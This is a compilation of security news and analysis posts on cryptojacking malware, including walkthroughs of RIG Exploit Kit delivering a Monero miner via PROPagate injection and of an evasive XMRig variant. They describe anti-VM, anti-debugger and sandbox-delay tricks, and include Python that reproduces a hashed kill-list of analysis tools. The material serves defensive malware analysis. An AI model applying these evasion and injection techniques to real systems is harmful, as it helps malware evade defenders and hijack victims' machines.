The mining applications that followed were developed to harness the power of graphics processing units (GPUs) to work more efficiently than mining with CPUs. GPUs are commonly used in enterprise settings, but they are also used for PC gaming, rendering graphics, scientific modeling and a variety of other complex tasks.

Today, bitcoin is mined with specialized application-specific integrated circuits (ASICs), which are optimized for the bitcoin algorithm, making general-purpose GPUs much less desirable for this purpose. However, bitcoin is no longer the only valuable cryptocurrency being mined.

New cryptocurrencies, such as Ethereum and Monero, are ASIC-resistant and better suited for mining by general-purpose computers. The creators of these cryptocurrencies worried about the centralization of bitcoin mining because of ASICs. Therefore, they created mining algorithms that harness memory capacity and speed. As a result, these new coins can be mined with general-purpose computers — triggering the rapid growth of mining malware across the globe.

The Difference Between Web- and Host-Based Mining Malware

Current mining malware can be divided into two major groups: web- and host-based malware.

Web-based mining malware is hosted on a website and activates when a user browses on an infected page. It is often written in JavaScript and executes as a web application on the local machine. This type of malware typically mines currencies like Monero, which is well-suited for mining via CPUs. Web-based miners are difficult to detect or stop because — while they don’t install themselves on local machines — they exploit local machines for their own purposes, unbeknownst to the users. Potential consequences of this type of attack include significant performance degradation, crashes and even overheating for mobile devices, according to ZDNet.

Host-based mining malware is a malicious application installed natively on the system, typically by a dropper-type Trojan. Often, the malware is just standard mining software running in a windowless mode in the background.

Other times, however, it’s more sophisticated. For example, the malware may use process-hollowing techniques to execute itself and then disguise the mining application’s process inside a legitimate system process — making it harder for users and antivirus solutions to identify and remove it. Host-based malware has better access to system resources, including the computer’s GPU, making it potentially much more lucrative for cybercriminals.

Additionally, the miner can schedule its activity for ideal times — so the user does not feel any performance impact — giving the cryptojacking better longevity on infected machines.

One example of host-based cryptojacking was reported in February 2017 when malicious actors breached a popular software download site to infect Apple product updates with mining malware, according to Help Net Security. Apple OSX computers are known for their high-end hardware, making them appealing targets for mining malware.

New Strategies Mean New Targets

Mining malware represents a relatively new threat to businesses. Unlike ransomware, it exploits hardware resources rather than the value of data. Businesses typically have large internal networks, which translates to heavy processing power.

As more companies move to cloud-based storage solutions, ransomware is becoming less effective at generating profit for criminals. Business owners with cloud storage can simply wipe their systems and restore their files from those backups. Attackers slinging mining malware aren’t interested in collecting ransom payments. As soon as a miner starts working, its operator can start raking in profits in the form of cryptocurrency.

Also, mining malware is much stealthier than ransomware because it doesn’t need to alert the user in any way. While ransomware notifies the user of its presence as a way to elicit payment, mining malware can run in the background for months — or even years — before discovery, especially if security professionals aren’t actively looking for it.

Since mining performance is determined by hardware performance, infecting high-end workstations and desktops is a priority for threat actors. This tactic is bad news for creative and scientific industries that use powerful computers to develop films, animations and games or conduct complex research. These types of organizations are also less likely to have invested in security and more likely to have awareness gaps.

What Can Companies Do to Limit the Threat of Cryptojacking?

Mining malware poses a serious threat to businesses across all sectors. Computers infected with host-based malware can be further infected with ransomware, spyware and other malicious applications. Organizations should educate their users and security leaders about the threat and take a proactive approach to detect it on enterprise endpoints.

Businesses should also invest in anti-malware programs to block known variants of mining malware and implement controls to identify mining activity. A security information and event management (SIEM) tool, for example, can alert security teams to high CPU and GPU usage during nonbusiness hours. Finally, behavioral analytics tools can help analysts identify abnormal patterns in resource usage with automation.


The post Move Over, Ransomware: Why Cybercriminals Are Shifting Their Focus to Cryptojacking appeared first on Security Intelligence.

League of Legends Philippines Attacked By CoinHive Monero Mining Malware

Cryptocurrency mining malware attacks are becoming increasingly common. Malware provides an easy way for the hackers to mine crypto without

League of Legends Philippines Attacked By CoinHive Monero Mining Malware on Latest Hacking News.

Smashing Security #086: Elon Musk submarine scams and 2FA bypass

Crypto scamming Thai cave scoundrels! $25 million to make anti-fake news videos! TimeHop data breach! Phone number port out scams!

All this and much much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by B J Mendelson.

Hola VPN Hack Targets MyEtherWallet Users

MyEtherWallet (MEW), a well-known cryptocurrency wallet interface, used Twitter to urge MEW customers who used Hola VPN within the last 24 hours, to transfer their funds immediately to a brand new account. They said they received a report that confirms the Hola VPN Chrome extension has been hacked. MEW’s Twitter account stated the attack was logging users’ activity including sensitive information such as usernames and passwords. The details of a currently unknown number of MEW users were exposed to hackers during a five-hour window on July 9th.

Hola VPN said in a blog post that upon learning about the incident, they immediately set up a response team of cybersecurity experts to investigate the incident and prevent it from happening again. They claim they immediately took emergency steps to replace the malicious extension causing the data leak. Regular MEW users were not affected by the data breach as the MEW service was not compromised, and the incident is known to be entirely out of MEW developers’ control. However, the breach certainly throws a shadow at the Israeli VPN service provider.

This is not the first time MEW users are being targeted. Earlier this year hackers managed to snatch more than $300,000 through execution of a sophisticated DNS hijacking attack. Many users lost their funds forever. Services such as MyEtherWallet do not operate like banks –  they do not charge transactions fees, they do not offer insurance, and they do not store cryptocurrency. Instead, they provide users with an interface that allows their clients to interact directly with the blockchain. Hugely unregulated and still in its wild west years, blockchain is like a vast, global, decentralized spreadsheet, and users are the only one responsible for the funds they store on such virtual wallet interfaces.

How to protect yourself?

First and foremost, use common sense and make sure that the sites you are visiting are legitimate. If you are a MEW user, your website needs to be Even if a single letter in the URL is changed, you are not in the correct place, and you are being phished.

Avoid opening websites that feel sketchy, or you do not trust – clicking on random links you see on social media may end up forwarding you to malicious sites. If you want to access a specific website, open a new tab on your browser and type the correct link manually. Navigating directly to the website decreases the chances of ending up on a phishing website.

Do not use the same password on other websites. One of the worst cybersecurity practices is to use the same password on multiple sites. If you struggle to remember your passwords, use tools that allow you to keep them safe and protected, or write them on a piece of paper. Make sure to change your passwords every three months – sometimes it takes years for companies to announce that they have been hacked.

Lastly, make sure that you have antivirus software installed on all your connected devices, and that you deal with reliable VPN service providers. As in real life, cheap (or free) services sometimes end up costing more. Quality VPNs encrypt your web traffic, do not allow hackers to monitor your online activity and do not let cybercriminals re-route your web traffic to phishing websites. Stay safe!


The post Hola VPN Hack Targets MyEtherWallet Users appeared first on Panda Security Mediacenter.

Does the Rise of Crypto-Mining Malware Mean the End of Ransomware?

Crypto-mining malware activity grew significantly in the first quarter of 2018, according to new research, suggesting that threat actors are finding this tactic to be more lucrative than traditional ransomware attacks due to the increasing popularity and value of digital currencies.

But this shift doesn’t signal an end to the threat of ransomware — rather, it points to an evolution toward more targeted attacks against specific organizations and industries, such as healthcare, that are most vulnerable and store particularly valuable data.

Cybercriminals Shift Tactics Amid Cryptocurrency Gold Rush

In short, this new trend shows that cybercriminals follow the money. Amid the rising popularity of cryptocurrencies like bitcoin, Monero and Ethereum, threat actors have embraced crypto-mining schemes as a way to generate illicit financial gains with the least amount of effort, in the shortest time possible — and at a relatively low risk of discovery.

According to McAfee Labs Threats Report: June 2018, researchers observed more than 2.9 million samples of crypto-mining malware in the first quarter of 2018 — a 629 percent increase from just 400,000 samples in the last quarter of 2017.

“Cybercriminals will gravitate to criminal activity that maximizes their profit,” said Steve Grobman, chief technology officer (CTO) at McAfee, in a June 2018 press release. “With the rise in value of cryptocurrencies, the market forces are driving criminals to crypto-jacking and the theft of cryptocurrency. Cybercrime is a business, and market forces will continue to shape where adversaries focus their efforts.”

Troy Mursch, the security researcher behind the website Bad Packets Report, noted that the industry is seeing so many JavaScript-based crypto-miners because most modern browsers run JavaScript. This means that nearly every web user is a target of malicious crypto-jacking attacks.

Alternatively, attackers can obtain far more computing power by infecting a server or other network asset with crypto-mining malware, which makes enterprise networks particularly lucrative targets for crypto-jacking campaigns. Browser-based crypto-mining also does not require the attacker to craft an exploit, and the mining usually goes unnoticed: the only symptom is a busy CPU, so users may not realize for some time that their browser is working for someone else.

Why Ransomware Is Down but Not Out

These characteristics of crypto-mining could explain why some attackers have moved away from traditional ransomware. Victims also know when they’ve suffered a ransomware infection and can respond accordingly, which demotivates potential attackers.

But the fact that opportunistic attackers are leaving ransomware behind doesn’t mean the threat is over and done — it’s merely changing. For instance, threat intelligence provider Recorded Future noted that ransomware attack campaigns are becoming more targeted in nature. This is evident in ransomware actors’ penchant for going after healthcare, an industry in which resource deprivation can threaten people’s lives and trigger urgent responses. According to insurance company Beazley Group, healthcare targeting accounted for 45 percent of all ransomware attacks in 2017.

Attackers are also beginning to leverage the mere threat of high-profile ransomware to extract payment. Action Fraud, the U.K.’s cybercrime reporting center, detected one such scam campaign warning users that they had been infected with WannaCry. In reality the emails simply aimed to scare recipients into sending a bitcoin payment, so the attackers profited without distributing any malicious software at all.

How Companies Can Defend Against Crypto-Mining Malware

Amid the growth of crypto-mining malware and the ongoing evolution of ransomware, enterprises can defend themselves against both by investing in an endpoint security solution and creating a patch management program.

Because ransomware relies on suspicious emails and software vulnerabilities for distribution, users can guard against its primary attack vectors by following best security practices. Organizations can further defend themselves by regularly updating antivirus software and training employees to refrain from engaging fraudsters over email.

The post Does the Rise of Crypto-Mining Malware Mean the End of Ransomware? appeared first on Security Intelligence.

New Virus Decides If Your Computer Good for Mining or Ransomware

Security researchers have discovered an interesting piece of malware that infects systems with either a cryptocurrency miner or ransomware, depending upon their configurations to decide which of the two schemes could be more profitable. While ransomware is a type of malware that locks your computer and prevents you from accessing the encrypted data until you pay a ransom to get the decryption

CoinHive URL Shortener Abused to Secretly Mine Cryptocurrency Using Hacked Sites

Security researchers have been warning about a new malicious campaign that leverages an alternative scheme to mine cryptocurrencies without directly injecting the infamous CoinHive JavaScript into thousands of hacked websites. Coinhive is a popular browser-based service that lets website owners embed JavaScript code that uses their visitors' CPU power in order to mine the

Kaspersky Deems Crypto-jacking the New Ransomware as Crypto-miners up Their Game

Because of its potential to earn hackers millions in a steady stream of cash, Kaspersky Lab has deemed crypto-jacking the new ransomware in a report that arrived just as researchers spotted two new types of malware targeting the growing popularity of cryptocurrencies. In its report released last Wednesday, Kaspersky declared that crypto-mining...

RIG Exploit Kit Delivering Monero Miner Via PROPagate Injection Technique


Through FireEye Dynamic Threat Intelligence (DTI), we observed RIG Exploit Kit (EK) delivering a dropper that leverages the PROPagate injection technique to inject code that downloads and executes a Monero miner (similar activity has been reported by Trend Micro). Apart from leveraging a relatively little-known injection technique, the attack chain has some other interesting properties that we will touch on in this blog post.

Attack Chain

The attack chain starts when the user visits a compromised website that loads the RIG EK landing page in an iframe. The RIG EK uses various techniques to deliver the NSIS (Nullsoft Scriptable Install System) loader, which leverages the PROPagate injection technique to inject shellcode into explorer.exe. This shellcode executes the next payload, which downloads and executes the Monero miner. The flow chart for the attack chain is shown in Figure 1.

Figure 1: Attack chain flow chart

Exploit Kit Analysis

When the user visits a compromised site that is injected with an iframe, the iframe loads the landing page. The iframe injected into a compromised website is shown in Figure 2.

Figure 2: Injected iframe

The landing page contains three different JavaScript snippets, each of which uses a different technique to deliver the payload. None of these techniques is new, so we will only give a brief overview of each one in this post.

JavaScript 1

The first JavaScript has a function, fa, which returns a VBScript that will be executed using the execScript function, as shown by the code in Figure 3.

Figure 3: JavaScript 1 code snippet

The VBScript exploits CVE-2016-0189 (a memory-corruption flaw in the VBScript engine of Internet Explorer) to download the payload and execute it using the code snippet seen in Figure 4.

Figure 4: VBScript code snippet

JavaScript 2

The second JavaScript contains a function that will retrieve additional JavaScript code and append this script code to the HTML page using the code snippet seen in Figure 5.

Figure 5: JavaScript 2 code snippet

This newly appended JavaScript exploits CVE-2015-2419, a memory-corruption vulnerability in Internet Explorer's JScript9 engine that is reached through JSON.stringify. The script obfuscates the call to JSON.stringify by storing pieces of the exploit in the variables shown in Figure 6.

Figure 6: Obfuscation using variables

Using these variables, the JavaScript calls JSON.stringify with malformed parameters in order to trigger CVE-2015-2419 which in turn will cause native code execution, as shown in Figure 7.

Figure 7: Call to JSON.stringify

JavaScript 3

The third JavaScript, like the second, adds further JavaScript to the page. This additional JavaScript adds a Flash object that exploits CVE-2018-4878 (a use-after-free in Adobe Flash Player), as shown in Figure 8.

Figure 8: JavaScript 3 code snippet

Once the exploitation is successful, the shellcode invokes a command line to create a JavaScript file with filename u32.tmp, as shown in Figure 9.

Figure 9: WScript command line

This JavaScript file is launched using WScript, which downloads the next-stage payload and executes it using the command line in Figure 10.

Figure 10: Malicious command line

Payload Analysis

For this attack, the actor has used multiple payloads and anti-analysis techniques to evade analysis environments. Figure 11 shows the complete malware activity flow chart.

Figure 11: Malware activity flow chart

Analysis of NSIS Loader (SmokeLoader)

The first payload dropped by the RIG EK is a compiled NSIS executable famously known as SmokeLoader. Apart from NSIS files, the payload has two components: a DLL, and a data file (named ‘kumar.dll’ and ‘abaram.dat’ in our analysis case). The DLL has an export function that is invoked by the NSIS executable. This export function has code to read and decrypt the data file, which yields the second stage payload (a portable executable file).

The DLL then spawns a new instance of the dropper in a suspended state (CREATE_SUSPENDED) and injects the decrypted PE into it using process hollowing.

Analysis of Injected Code (Second Stage Payload)

The second stage payload is a highly obfuscated executable. It consists of a routine that decrypts a chunk of code, executes it, and re-encrypts it.

At the entry point, the executable checks the OS major version, which it reads from the Process Environment Block (PEB). If the value is less than 6 (i.e. older than Windows Vista), the executable terminates itself. It also reads the BeingDebugged flag at offset 0x2 of the PEB and terminates itself if the flag is set.

The malware also implements an anti-VM check by reading the value named 0 under the registry key HKLM\SYSTEM\ControlSet001\Services\Disk\Enum (the device instance ID of the first disk) and checking whether its data contains any of the strings vmware, virtual, qemu or xen. Each of these strings is indicative of a virtual machine.

After running the anti-analysis and environment check, the malware starts executing the core code to perform the malicious activity.

The malware uses the PROPagate injection method to inject and execute the code in a targeted process. The PROPagate method is similar to the SetWindowLong injection technique. In this method, the malware uses the SetPropA function to modify the callback for UxSubclassInfo and cause the remote process to execute the malicious code.

This code injection technique only works against a target process at the same or a lower integrity level. The malware first checks whether the current process is running at medium integrity level (0x2000, SECURITY_MANDATORY_MEDIUM_RID). Figure 12 shows the code snippet.

Figure 12: Checking integrity level of current process

If the process is at medium integrity level or higher, the malware proceeds. If it is below medium integrity, the malware respawns itself at medium integrity.

The malware creates a file mapping object and writes the dropper's file path to it; the injected code later opens the same mapping object to read the path and delete the dropper. The name of the mapping object is derived from the volume serial number of the system drive XORed with a hardcoded constant (Figure 13):

File Mapping Object Name = “Volume Serial Number” + “Volume Serial Number” XOR 0x7E766791

Figure 13: Creating file mapping object name

The malware then decrypts the third stage payload using XOR and decompresses it with RtlDecompressBuffer. The third stage payload is also a PE executable, but the author has altered the file header so that memory scanners do not recognize it as a PE file. After restoring several header fields at the start of the decrypted data, we obtain a proper executable header (Figure 14).

Figure 14: Injected executable without header (left), and with header (right)

After decrypting the payload, the malware targets the shell process, explorer.exe, for malicious code injection. It uses GetShellWindow and GetWindowThreadProcessId APIs to get the shell window’s thread ID (Figure 15).

Figure 15: Getting shell window thread ID

The malware injects and maps the decrypted PE in a remote process (explorer.exe). It also injects shellcode that is configured as a callback function in SetPropA.

After injecting the payload into the target process, it uses the EnumChildWindows and EnumProps functions to enumerate all entries in the property list of the shell window and compares each with UxSubclassInfo.

After finding the UxSubclassInfo property of the shell window, it saves the handle info and uses it to set the callback function through SetPropA.

SetPropA takes three arguments, the third of which is the property data. The callback procedure address is stored at offset 0x14 from the beginning of that data. The malware overwrites the callback address with the address of the injected shellcode (Figure 16).

Figure 16: Modifying callback function

The malware then sends a specific message to the window to execute the callback procedure corresponding to the UxSubclassInfo property, which leads to the execution of the shellcode.

The shellcode starts a thread at the entry point of the injected third stage payload using CreateThread. It then restores the callback that it had overwritten during the PROPagate injection. Figure 17 shows the code snippet of the injected shellcode.

Figure 17: Assembly view of injected shellcode
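The callback field is where a defender can look for this injection. The Python below is an added example, not FireEye's code: given a copy of the UxSubclassInfo property data read out of the target process and the target's module map, it reads the callback pointer at offset 0x14 (per the description above) and flags it when it points outside any loaded module, which is what an injected shellcode buffer looks like. The module ranges and the two property blobs are constructed fixtures; on a live system the blob comes from ReadProcessMemory on the pointer that GetProp returns for UxSubclassInfo, and the ranges from a module snapshot of explorer.exe.

```python
import struct
from typing import Dict, Optional, Tuple

# Per the description above, the callback procedure address lives at offset 0x14
# of the data behind the UxSubclassInfo property; the rest of the layout is not needed here.
CALLBACK_OFFSET = 0x14

# Constructed module map (base, end) for a hypothetical 32-bit explorer.exe. The ranges
# are illustrative; on a live system they come from a module snapshot of the target.
MODULES: Dict[str, Tuple[int, int]] = {
    "explorer.exe": (0x00F40000, 0x01200000),
    "comctl32.dll": (0x74A00000, 0x74B40000),
    "user32.dll":   (0x76E00000, 0x76F80000),
}


def read_subclass_callback(blob: bytes, bitness: int = 32) -> int:
    """Return the callback pointer stored at CALLBACK_OFFSET in the property data."""
    fmt = "<I" if bitness == 32 else "<Q"
    need = CALLBACK_OFFSET + struct.calcsize(fmt)
    if len(blob) < need:
        raise ValueError(f"property data too short: {len(blob)} bytes, need {need}")
    return struct.unpack_from(fmt, blob, CALLBACK_OFFSET)[0]


def module_for(address: int, modules: Dict[str, Tuple[int, int]]) -> Optional[str]:
    """Name of the loaded module whose image range contains address, or None."""
    for name, (base, end) in modules.items():
        if base <= address < end:
            return name
    return None


def assess_uxsubclassinfo(blob: bytes, modules: Dict[str, Tuple[int, int]], bitness: int = 32) -> dict:
    """Legitimate subclass procedures live inside a loaded module (comctl32, the shell
    itself, ...). A callback that points into memory backed by no module is the
    PROPagate tell-tale: that is where the injector mapped its shellcode."""
    callback = read_subclass_callback(blob, bitness)
    owner = module_for(callback, modules)
    return {"callback": callback, "module": owner, "suspicious": owner is None}


def make_property_data(callback: int, bitness: int = 32) -> bytes:
    """Build property data with only the callback field populated (demo fixture)."""
    fmt = "<I" if bitness == 32 else "<Q"
    data = bytearray(0x40)
    struct.pack_into(fmt, data, CALLBACK_OFFSET, callback)
    return bytes(data)


# Constructed fixtures: a callback inside comctl32.dll, and one pointing at an
# unbacked region such as a buffer the injector allocated in the remote process.
BENIGN_DATA = make_property_data(0x74A1B3C0)
HIJACKED_DATA = make_property_data(0x02C50000)

if __name__ == "__main__":
    for label, data in (("benign", BENIGN_DATA), ("hijacked", HIJACKED_DATA)):
        r = assess_uxsubclassinfo(data, MODULES)
        print(f"{label}: callback=0x{r['callback']:08X} module={r['module']} suspicious={r['suspicious']}")
```

Because the shellcode restores the original callback as soon as it has started its thread, this check only catches the property during the injection window; a periodic sweep of the shell window's properties, or a hook on SetPropA in the target, is needed to see it reliably.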

Analysis of Third Stage Payload

Before executing its malicious code, the malware performs anti-analysis checks to make sure no analysis tool is running on the system. It creates two infinitely running threads that implement these checks.

The first thread enumerates processes using CreateToolhelp32Snapshot and looks for process names commonly associated with analysis tools. It computes a DWORD hash of each process name using a custom operation and compares it with an array of hardcoded DWORD values; if the hash matches any value in the array, it terminates the corresponding process. Shipping hashes rather than strings keeps the tool names out of the binary, so an analyst has to recover them by hashing candidate names.

The second thread enumerates windows using EnumWindows and retrieves each window's class name with GetClassNameA. As in the first thread, it computes a DWORD hash of the class name with the same custom operation and compares it against an array of hardcoded DWORD values; on a match, it terminates the process that owns the window.
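As an added example (not taken from the sample), here are both sides of that hash-based blocklist in Python. The hash is an assumed stand-in, the additive ROR-13 routine common in shellcode, because the article does not disclose the sample's custom operation; the tool names and window class names are an illustrative wordlist, not the sample's actual list. build_blocklist produces what the malware author ships (hashes only), should_terminate and sweep emulate the two threads described above, and resolve_blocklist is the analyst's move: hash a wordlist of known tools and see which of the hardcoded values it explains.

```python
from typing import Dict, Iterable, List


def ror13_hash(name: str) -> int:
    """Assumed stand-in for the sample's undisclosed 'custom operation': the additive
    ROR-13 hash common in shellcode. Names are upper-cased first (an assumption; many
    such hashes are case-insensitive so 'ProcMon.exe' and 'procmon.exe' match)."""
    h = 0
    for b in name.upper().encode("ascii", "replace"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF   # rotate right by 13 within 32 bits
        h = (h + b) & 0xFFFFFFFF
    return h


# Illustrative wordlists of analysis tools an analyst would try; they are not the
# sample's actual lists. The window class names are those of the tools named.
ANALYSIS_PROCESSES = [
    "procmon.exe", "procexp.exe", "procexp64.exe", "wireshark.exe", "ollydbg.exe",
    "x32dbg.exe", "x64dbg.exe", "idaq.exe", "idaq64.exe", "windbg.exe",
    "fiddler.exe", "tcpview.exe", "autoruns.exe",
]
ANALYSIS_WINDOW_CLASSES = ["PROCMON_WINDOW_CLASS", "OLLYDBG", "WinDbgFrameClass"]


def build_blocklist(names: Iterable[str]) -> List[int]:
    """What the malware author ships: a sorted array of DWORD hashes, no strings."""
    return sorted({ror13_hash(n) for n in names})


def should_terminate(name: str, blocklist: List[int]) -> bool:
    """The sample's check: hash the observed process or class name and look it up."""
    return ror13_hash(name) in blocklist


def sweep(snapshot: Iterable[str], blocklist: List[int]) -> List[str]:
    """Emulates the first thread: which names from a process snapshot would be killed."""
    return [name for name in snapshot if should_terminate(name, blocklist)]


def resolve_blocklist(blocklist: Iterable[int], wordlist: Iterable[str]) -> Dict[int, str]:
    """Analyst side: hash every candidate name and see which hardcoded values it
    explains. Hashes that stay unresolved need a bigger wordlist."""
    table = {ror13_hash(w): w for w in wordlist}
    return {h: table[h] for h in blocklist if h in table}


PROCESS_BLOCKLIST = build_blocklist(ANALYSIS_PROCESSES)
CLASS_BLOCKLIST = build_blocklist(ANALYSIS_WINDOW_CLASSES)

if __name__ == "__main__":
    snapshot = ["explorer.exe", "svchost.exe", "Procmon.exe", "notepad.exe", "x64dbg.exe"]
    print("would terminate:", sweep(snapshot, PROCESS_BLOCKLIST))
    print("hashes shipped:", [f"0x{h:08X}" for h in PROCESS_BLOCKLIST])
    print("resolved:", resolve_blocklist(PROCESS_BLOCKLIST, ANALYSIS_PROCESSES))
```

With the real hash routine lifted from the disassembly substituted for ror13_hash, the same resolve_blocklist call turns the sample's array of DWORDs back into the list of tools it is hunting for, which in turn tells you which tools to rename or hide when running the sample in a sandbox.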

Other than these two anti-analysis techniques, it also checks internet connectivity by trying to reach www.msftncsi[.]com/ncsi.txt, the same URL Windows itself uses for its Network Connectivity Status Indicator, so the probe blends in with normal system traffic.

To remain persistent in the system, the malware installs a scheduled task and a shortcut file in %startup% folder. The scheduled task is named “Opera Scheduled Autoupdate {Decimal Value of GetTickCount()}”.

The malware then communicates with the malicious URL to download the final payload, which is a Monero miner. It computes an MD5 hash of the computer name and volume information using the Microsoft CryptoAPI and sends the hash to the server in a POST request. Figure 18 shows the network communication.

Figure 18: Network communication

The malware then downloads the final payload, the Monero miner, from the server and installs it in the system.


Although we have been observing a decline in Exploit Kit activity, attackers are not abandoning them altogether. In this blog post, we explored how RIG EK is being used with various exploits to compromise endpoints. We have also shown how the NSIS Loader leverages the lesser known PROPagate process injection technique, possibly in an attempt to evade security products.

FireEye MVX and the FireEye Endpoint Security (HX) platform detect this attack at several stages of the attack chain.


We would like to thank Sudeep Singh and Alex Berry for their contributions to this blog post.

Evasive Monero Miners: Deserting the Sandbox for Profit

Authored by: Alexander Sevtsov
Edited by: Stefano Ortolani


It’s not news that the cryptocurrency industry is on the rise. Mining crypto coins offers anybody a lucrative way to exchange computing resources for profit: every time a miner finds the solution to a computationally expensive proof-of-work puzzle, he is rewarded with newly minted coins. While some cryptocurrencies are based on puzzles that are only efficiently solved by special-purpose devices (such as Bitcoin on ASICs), others are still mined successfully on commodity hardware.

One in particular is the Monero (XMR) cryptocurrency. Besides being efficiently mined on standard CPUs and GPUs, it is also private, or fungible, to use the precise Monero term. Whereas transactions between Bitcoin wallets are easy to trace, a system relying on ring signatures and one-time stealth addresses makes Monero transactions difficult if not impossible to trace, effectively hiding the origin of a transaction. Because of this, it should come as no surprise that Monero is also mined for nefarious purposes, often by rogue JavaScript or by binaries downloaded onto and running on an unsuspecting user’s system.

Recent statistics show that 5% of all Monero coins are mined by malware. While the security industry is responding to this cryptojacking phenomenon by introducing new and improved detection techniques, developers of these binaries have begun to replicate the modus operandi of ransomware samples: they embed anti-analysis techniques to evade detection for as long as possible. In this blog article, we highlight some of our findings when analyzing a variant of the XMRig miner, and share insights about some evasion tricks used to bypass dynamic analysis systems.


The sample (sha1: d86c1606094bc9362410a1076e29ac68ae98f972) is an obfuscated .NET application that uses a simple crypter to load an embedded executable at runtime using the Assembly.Load method. The following 16-byte XOR key is used to decrypt it:

50 F5 96 DF F0 61 77 42 39 43 FE 30 81 95 6F AF

Execution is then transferred to the loaded assembly's entry point via EntryPoint.Invoke, after which another binary resource is decrypted, this time with AES-256 using a key derived with PBKDF2 (Figure 1).

Figure 1. AES decryption routine of the embedded file; note the PBKDF2 key derivation.
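As an added illustration (not code from the Lastline analysis), the following Python recovers a repeating XOR key of the kind listed above from an encrypted PE resource without knowing the key, using the fact that the first bytes of almost every PE are the fixed DOS header the Microsoft linker emits. The encrypted resource below is constructed here and encrypted with the 16-byte key from the article; the e_lfanew value and the payload bytes are assumptions for the demo. The AES-256/PBKDF2 second layer is not covered, since its salt and iteration count are not given above and AES is not in the Python standard library.

```python
import struct
from typing import Optional

# 16-byte XOR key reported above for the first crypter layer.
ARTICLE_KEY = bytes.fromhex("50F596DFF06177423943FE3081956FAF")

# Known plaintext: the first 60 bytes of the DOS header the Microsoft linker emits for
# nearly every PE. Byte 0x3C (e_lfanew) varies per file, so it is excluded.
KNOWN_DOS_HEADER = bytes.fromhex(
    "4D5A90000300000004000000FFFF0000"   # e_magic "MZ" through e_ss
    "B8000000000000004000000000000000"   # e_sp through e_res
    + "00" * 28                          # reserved fields up to e_lfanew
)


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key is the identity."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(data: bytes) -> bool:
    """Structural check: fixed DOS header bytes and a 'PE\\0\\0' signature at e_lfanew."""
    if len(data) < 0x40 or data[:len(KNOWN_DOS_HEADER)] != KNOWN_DOS_HEADER:
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_xor_key(ciphertext: bytes, max_key_len: int = 60) -> Optional[bytes]:
    """Known-plaintext recovery: key[i] = ciphertext[i] ^ header[i] for each candidate
    length, shortest first, keeping the first key that decrypts to a valid PE."""
    limit = min(max_key_len, len(KNOWN_DOS_HEADER), len(ciphertext))
    for key_len in range(1, limit + 1):
        key = bytes(c ^ p for c, p in zip(ciphertext[:key_len], KNOWN_DOS_HEADER[:key_len]))
        if looks_like_pe(xor_repeating(ciphertext, key)):
            return key
    return None


def unpack_xor_layer(ciphertext: bytes) -> Optional[bytes]:
    """Return the decrypted PE if a key can be recovered, else None."""
    key = recover_xor_key(ciphertext)
    return xor_repeating(ciphertext, key) if key else None


def build_fake_pe(payload: bytes = bytes(range(64))) -> bytes:
    """Constructed minimal PE-shaped blob for the demo (not a real executable):
    standard DOS header, e_lfanew = 0x80, then the PE signature and some payload."""
    e_lfanew = 0x80
    header = KNOWN_DOS_HEADER + struct.pack("<I", e_lfanew)
    header += b"\x00" * (e_lfanew - len(header))
    return header + b"PE\x00\x00" + payload


PLAINTEXT = build_fake_pe()
ENCRYPTED_RESOURCE = xor_repeating(PLAINTEXT, ARTICLE_KEY)   # what the .NET loader would carry

if __name__ == "__main__":
    key = recover_xor_key(ENCRYPTED_RESOURCE)
    print("recovered key:", key.hex() if key else None)
    print("matches article key:", key == ARTICLE_KEY)
```

Trying the shortest key length first matters: any multiple of the true period also decrypts correctly, so the first hit is the real key. Crypters that XOR only part of the file, or start at a non-zero offset, need the known-plaintext window slid along the resource before the same derivation applies.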

The decrypted data consists of yet another executable. We can see it in Figure 2 surrounded by strings that already give away some of the functionality included (in particular, note the CheckSandbox and CheckVM strings, most likely routines used to detect whether the sample is running inside an analysis environment).

Figure 2. Decrypted binary blob with an embedded executable file.

As the reader can imagine, we are always interested in discovering novel evasion techniques. With piqued curiosity, we decided to dive into the code a bit further.


After peeling off all encryption layers, we finally reached the unpacked payload (see Figure 3). As expected, we found quite a number of anti-analysis techniques.

Figure 3. The unpacked payload (sha1: 43f84e789710b06b2ab49b47577caf9d22fd45f8) as found in VT.

The most classic trick (shown in Figure 4) merely checks window titles for known analysis tools. Process Explorer, Process Monitor and the like are used to see which processes are running, how they are spawned, and how much CPU time each thread consumes, so a miner that wants to stay unnoticed has every interest in knowing when they are open. This is a pretty standard technique to detect such monitoring tools, and it has been used by other crypto miners as well. As we will see, the others were a bit more exotic.

Figure 4. Detecting known process monitoring tools via GetWindowTextW.

Evasion Technique – Lack of User Input

This technique specifically targets dynamic analysis systems. It tries to detect whether it is executing on a real host by measuring how recently the operating system received user input. Admittedly, this is not that rare, and we covered it before in a previous article describing some evasion techniques used by ransomware.

Figure 5. Detecting sandbox by checking the last user input via GetLastInputInfo.

Figure 5 shows the logic in more detail: the code measures the time interval between two subsequent inputs. Anything longer than one minute is taken as an indicator that the binary is running inside a sandbox. Note that besides being prone to false positives (an unattended but perfectly real workstation trips it too), this technique is easily circumvented by a sandbox that simulates user interaction.

Evasion Technique – Multicast IcmpSendEcho

The second anti-analysis technique that we investigated delays execution via the IcmpCreateFile and IcmpSendEcho APIs. As further detailed in Figure 6, they are used to ping a reserved multicast address with a timeout of 30 seconds. Since no answer is expected (interestingly, we know of some devices that erroneously reply to those ICMP packets), the IcmpSendEcho call has the side effect of blocking the executing thread for the full 30 seconds, a delay that a sandbox cannot shortcut by simply hooking or patching the Sleep API.

Figure 6. Delaying the execution via IcmpSendEcho API.

It’s worth noting that a similar trick was previously used by some infected CCleaner samples. In that case, the malicious shellcode went a step further by checking whether the timeout parameter had been patched in an attempt to accelerate execution (and thus counter the anti-analysis technique).


Any dynamic analysis system wishing to cope with advanced evasive malware must be able to unpack layers of encryption and counter basic anti-analysis techniques. In Figure 7 we can see all the behaviors extracted when fully executing the original sample: the final payload is recognized as a variant of the XMRig Monero CPU Miner, and its network traffic correctly picked up and marked as suspicious.

Figure 7. Lastline analysis of the XMRig CPU miner.

